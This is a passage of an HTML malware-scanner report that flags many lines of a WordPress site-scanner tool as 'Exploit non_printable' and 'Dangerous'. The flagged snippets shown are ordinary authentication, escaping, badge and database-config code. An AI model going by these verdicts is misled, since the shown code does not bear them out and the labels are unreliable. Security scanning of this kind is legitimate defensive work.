<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'error' </span><span style="color: #007700">=> </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; '</span><span style="color: #007700">, </span><span style="color: #0000BB">$errors</span><span style="color: #007700">), </span><span style="color: #DD0000">'scan_log' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$scan_log</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1584</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return array(</span><span style="color: #DD0000">'sites' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$sites</span><span style="color: #007700">, </span><span style="color: #DD0000">'scan_log' </span><span style="color: #007700">=> </span><span style="color: #0000BB">$scan_log</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 158</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_verify_password</span><span style="color: #007700">(</span><span style="color: #0000BB">$plain</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 15</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_action_param</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 160</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">hash_equals</span><span style="color: #007700">(</span><span style="color: #0000BB">$expected</span><span style="color: #007700">, </span><span style="color: #0000BB">$actual</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1646</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">cms_badge</span><span style="color: #007700">(</span><span style="color: #0000BB">$cms</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1647</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-wp'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1648</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-joo'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1649</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-lar'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_auth_token</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1650</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-oc'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1651</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-empty'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'badge-other'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 166</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">hash</span><span style="color: #007700">(</span><span style="color: #DD0000">'sha256'</span><span style="color: #007700">, </span><span style="color: #0000BB">app_password_expected_hash</span><span style="color: #007700">() . </span><span style="color: #DD0000">'|' </span><span style="color: #007700">. </span><span style="color: #0000BB">$sid </span><span style="color: #007700">. </span><span style="color: #DD0000">'|' </span><span style="color: #007700">. </span><span style="color: #0000BB">up_to_wp_runtime_base_dir</span><span style="color: #007700">());</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 168</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_is_authenticated</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">up_to_wp_mode</span><span style="color: #007700">() ? </span><span style="color: #DD0000">'up_to_action' </span><span style="color: #007700">: </span><span style="color: #DD0000">'action'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 170</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'current_user_can'</span><span style="color: #007700">) && </span><span style="color: #0000BB">current_user_can</span><span style="color: #007700">(</span><span style="color: #DD0000">'manage_options'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'up_to_auth'</span><span style="color: #007700">]) && </span><span style="color: #0000BB">hash_equals</span><span style="color: #007700">(</span><span style="color: #0000BB">app_auth_token</span><span style="color: #007700">(), (string) </span><span style="color: #0000BB">$_SESSION</span><span style="color: #007700">[</span><span style="color: #DD0000">'up_to_auth'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 174</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_login</span><span style="color: #007700">(</span><span style="color: #0000BB">$password</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 177</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_logout</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 182</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_auth_fail_json</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'admin_url'</span><span style="color: #007700">) ? </span><span style="color: #0000BB">h</span><span style="color: #007700">(</span><span style="color: #0000BB">admin_url</span><span style="color: #007700">(</span><span style="color: #DD0000">'tools.php?page=up-to-scanner'</span><span style="color: #007700">)) : </span><span style="color: #DD0000">'#'</span><span style="color: #007700">; </span><span style="color: #0000BB">?></span>" target="_top">К плагину</a></span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 185</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">app_render_login_page</span><span style="color: #007700">(</span><span style="color: #0000BB">$error </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_wp_endpoint_url_value</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">UP_TO_WP_ENDPOINT_URL</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 225</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">h</span><span style="color: #007700">(</span><span style="color: #0000BB">$s</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">htmlspecialchars</span><span style="color: #007700">(</span><span style="color: #0000BB">$s</span><span style="color: #007700">, </span><span style="color: #0000BB">ENT_QUOTES</span><span style="color: #007700">, </span><span style="color: #DD0000">'UTF-8'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_normalize_dir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2309</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">appPost</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2310</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">fetch</span><span style="color: #007700">(</span><span style="color: #0000BB">APP_ENDPOINT_URL </span><span style="color: #007700">|| </span><span style="color: #0000BB">window</span><span style="color: #007700">.</span><span style="color: #0000BB">location</span><span style="color: #007700">.</span><span style="color: #0000BB">href</span><span style="color: #007700">, {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2314</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">r</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2315</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">r</span><span style="color: #007700">.</span><span style="color: #0000BB">text</span><span style="color: #007700">().</span><span style="color: #0000BB">then</span><span style="color: #007700">(function(</span><span style="color: #0000BB">t</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">JSON</span><span style="color: #007700">.</span><span style="color: #0000BB">parse</span><span style="color: #007700">(</span><span style="color: #0000BB">t</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2328</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">toggleConfigsPanel</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteShowDbInfo</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 235</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$real </span><span style="color: #007700">!== </span><span style="color: #0000BB">false</span><span style="color: #007700">) ? </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$real</span><span style="color: #007700">), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">) : </span><span style="color: #0000BB">$path</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCloseDbView</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2368</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteEditDbConfig</span><span style="color: #007700">(</span><span style="color: #0000BB">site</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2379</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteCloseDbEdit</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2384</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteRenderDbPreview</span><span style="color: #007700">(</span><span style="color: #0000BB">fields</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2386</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">up_to_path_within_root</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$root</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$uri </span><span style="color: #007700">!== </span><span style="color: #DD0000">'' </span><span style="color: #007700">? </span><span style="color: #0000BB">$uri </span><span style="color: #007700">: (isset(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'SCRIPT_NAME'</span><span style="color: #007700">]) ? (string) </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'SCRIPT_NAME'</span><span style="color: #007700">] : </span><span style="color: #DD0000">''</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2400</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteParseDbSnippet</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2409</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">data</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">e</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteSaveDbCreds</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 244</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$p </span><span style="color: #007700">. </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$r </span><span style="color: #007700">. </span><span style="color: #DD0000">'/'</span><span style="color: #007700">) === </span><span style="color: #0000BB">0</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2451</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteFetchJson</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">appPost</span><span style="color: #007700">(</span><span style="color: #0000BB">fd</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2461</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteStatusApplyRowClass</span><span style="color: #007700">(</span><span style="color: #0000BB">row</span><span style="color: #007700">, </span><span style="color: #0000BB">status</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">siteStatusChanged</span><span style="color: #007700">(</span><span style="color: #0000BB">sel</span><span style="color: #007700">) {</span>
</span>
